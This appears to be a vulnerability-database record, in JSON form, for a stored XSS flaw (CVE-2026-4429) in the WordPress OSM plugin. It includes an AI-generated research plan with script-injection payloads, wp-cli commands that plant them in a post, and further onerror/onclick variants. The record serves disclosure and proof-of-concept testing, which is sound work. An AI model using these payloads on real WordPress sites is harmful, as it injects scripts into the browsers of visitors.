[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f_rKV58njlUbGPhaBcyNVSz-kPoLRDB7bmJryrXDzPuM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":33},"CVE-2026-4429","osm-authenticated-contributor-stored-cross-site-scripting-via-markername-shortcode-attribute","OSM \u003C= 6.1.15 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'marker_name' Shortcode Attribute","The OSM – OpenStreetMap plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'marker_name' and 'file_color_list' shortcode attribute of the [osm_map_v3] shortcode in all versions up to and including 6.1.15. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","osm",null,"\u003C=6.1.15","6.1.16","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-08 00:00:00","2026-04-09 02:25:05",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F65dffde9-2a50-41fe-bc21-3d0915068887?source=api-prod",1,[22,23,24,25],"osm-icon-class.php","osm.php","osm_map_v3\u002Fosm-sc-osm_map_v3.php","readme.txt","researched",false,3,"# Research Plan: CVE-2026-4429 - OSM Stored XSS\n\n## 1. Vulnerability Summary\nThe **OSM – OpenStreetMap** plugin for WordPress (versions \u003C= 6.1.15) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists within the handling of the `[osm_map_v3]` shortcode, specifically through the `marker_name` and `file_color_list` attributes. Because the plugin fails to sanitize or escape these attributes before rendering them in the page's HTML or JavaScript context, an attacker with at least Contributor-level permissions can inject malicious scripts into posts or pages.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress Post\u002FPage Editor (standard `wp-admin\u002Fpost.php` or Gutenberg block editor).\n*   **Shortcode:** `[osm_map_v3]`\n*   **Vulnerable Attributes:** `marker_name`, `file_color_list`.\n*   **Authentication Level:** Contributor or higher (any role capable of using shortcodes).\n*   **Vector:** The payload is stored in the `post_content` table and executes whenever the post\u002Fpage is viewed.\n\n## 3. Code Flow\n1.  **Entry Point:** When a post containing `[osm_map_v3]` is rendered, WordPress calls the shortcode handler.\n2.  **Registration:** The shortcode is handled in `osm_map_v3\u002Fosm-sc-osm_map_v3.php`.\n3.  **Attribute Extraction:** \n    *   Line 47: `extract(shortcode_atts(array(... 'file_color_list' => 'NoColor', ... 'marker_name' => 'NoName', ...), $atts));`\n    *   The variables `$marker_name` and `$file_color_list` now hold raw user-provided values.\n4.  **Processing:**\n    *   Line 81: Attributes are passed to the `cOsm_arguments` constructor.\n    *   Line 160: `$default_icon = new cOsm_icon($marker_name);` is called if `marker_size` is not set.\n5.  **Sink:** The variables are subsequently used to build the HTML and JavaScript that initializes the OpenLayers map. In version 6.1.15, these are reflected into the page without calling escaping functions like `esc_attr()` or `esc_js()`.\n\n## 4. Nonce Acquisition Strategy\nThis is a **Stored XSS** vulnerability via a shortcode. It does **not** require a plugin-specific AJAX nonce to exploit. The attacker only needs to be able to save a post.\n*   The \"exploit\" happens during the rendering phase. \n*   To *set up* the exploit, use the `wp-cli` to create a post as a Contributor.\n*   To *trigger* the exploit, navigate to the post URL.\n\n## 5. Exploitation Strategy\n### Step 1: Payload Selection\nWe will test two attributes: `marker_name` and `file_color_list`.\n*   **Payload A (Attribute breakout):** `\">\u003Cscript>alert('XSS_MARKER')\u003C\u002Fscript>`\n*   **Payload B (JS context breakout):** `';alert('XSS_COLOR');\u002F\u002F`\n\n### Step 2: Test Data Setup (via WP-CLI)\nCreate a post as a contributor user containing the malicious shortcode.\n\n```bash\n# 1. Ensure a contributor user exists\nwp user create contributor contributor@example.com --role=contributor --user_pass=password123\n\n# 2. Create a post with the malicious shortcode\nwp post create --post_type=post \\\n               --post_title=\"OSM Map Test\" \\\n               --post_status=publish \\\n               --post_author=$(wp user get contributor --field=ID) \\\n               --post_content='[osm_map_v3 marker_name=\"\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\" file_color_list=\"\\\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>\"]'\n```\n\n### Step 3: Trigger the Exploit\nNavigate to the newly created post in the browser context.\n\n```javascript\n\u002F\u002F PoC Agent: Use browser_navigate to the URL of the created post.\n\u002F\u002F The post ID can be captured from the 'wp post create' output.\n```\n\n## 6. Test Data Setup\n*   **Plugin Status:** OSM v6.1.15 installed and activated.\n*   **User Role:** A user with `edit_posts` capability (Contributor+).\n*   **Content:** A post containing the `[osm_map_v3]` shortcode with payloads in `marker_name` and\u002For `file_color_list`.\n\n## 7. Expected Results\n*   When the post is viewed, the HTML source should contain the unescaped script tags.\n*   The browser should trigger the `alert()` functions.\n*   Inspection of the DOM should show the script injected either into a `data-*` attribute of a `div` (breaking out with `\">`) or within a `\u003Cscript>` block.\n\n## 8. Verification Steps\n1.  **DOM Inspection:** Use `browser_eval` to check for the presence of the injected payload in the rendered page.\n    ```javascript\n    \u002F\u002F Check if the script was rendered\n    const scripts = Array.from(document.getElementsByTagName('script'));\n    const xssFound = scripts.some(s => s.textContent.includes('alert(document.domain)'));\n    return xssFound;\n    ```\n2.  **HTML Source Check:** Use `http_request` to fetch the post HTML and grep for the raw payload to confirm lack of encoding.\n    ```bash\n    # Expected: The response body contains the raw string:\n    # marker_name=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"\n    ```\n\n## 9. Alternative Approaches\nIf the plugin renders these attributes inside a JSON object passed to `wp_localize_script`, the breakout payload might need to be adjusted:\n*   **JS Object Payload:** `\"},alert(1),{\"a\":\"`\n*   **Broken Attribute Payload:** `marker_name=\"123' onclick='alert(1)'\"`\n\nIf `marker_name` is passed to the `cOsm_icon` class (as seen in line 160 of `osm-sc-osm_map_v3.php`), the vulnerability may manifest when the icon URL is generated in `osm-icon-class.php`. If the icon name is appended to a URL string without sanitization, an XSS via the `src` attribute of an `\u003Cimg>` tag is possible:\n*   **Payload:** `x\" onerror=\"alert(1)\"`","gemini-3-flash-preview","2026-04-17 20:15:29","2026-04-17 20:15:49",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","6.1.15","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fosm\u002Ftags\u002F6.1.15","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fosm.6.1.15.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fosm\u002Ftags\u002F6.1.16","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fosm.6.1.16.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fosm\u002Ftags"]